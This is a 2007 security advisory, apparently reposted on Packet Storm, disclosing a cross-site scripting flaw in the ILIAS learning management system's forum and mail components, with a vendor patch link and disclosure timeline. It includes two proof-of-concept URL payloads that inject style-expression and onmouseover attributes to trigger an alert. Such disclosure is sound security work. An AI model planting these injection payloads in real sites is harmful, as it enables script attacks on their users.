ILIAS versions 3.8.3 and below suffer from a cross site scripting vulnerability.
e2cf2c6d9b0345c010809efe44cb8a12======================================================================
ILIAS <= 3.8.3 Cross Site Scripting
======================================================================
Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting
Status: patch available
------------------------------
Affected software description:
------------------------------
Application: ILIAS
Version: <= 3.8.3
Vendor: http://www.ilias.de
Description:
ILIAS is a powerful web-based learning management system that allows
you to easily manage learning resources in an integrated system.
--------------
Vulnerability:
--------------
The mailing and forum components are vulnerable to cross site scripting.
------------
PoC/Exploit:
------------
create forum post/mail with:
http://www.ex"style="width:expression(alert('xss'))"ample.com
http://www.ex"onmouseover="javascript:alert('xss');"ample.com
---------
Solution:
---------
install security patch:
http://www.ilias.de/docu/goto.php?target=pg_16836_35&client_id=docu
---------
Timeline:
---------
17.10.2007 - vendor informed
25.10.2007 - vendor responded
29.10.2007 - vendor released patch
30.10.2007 - public disclosure
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!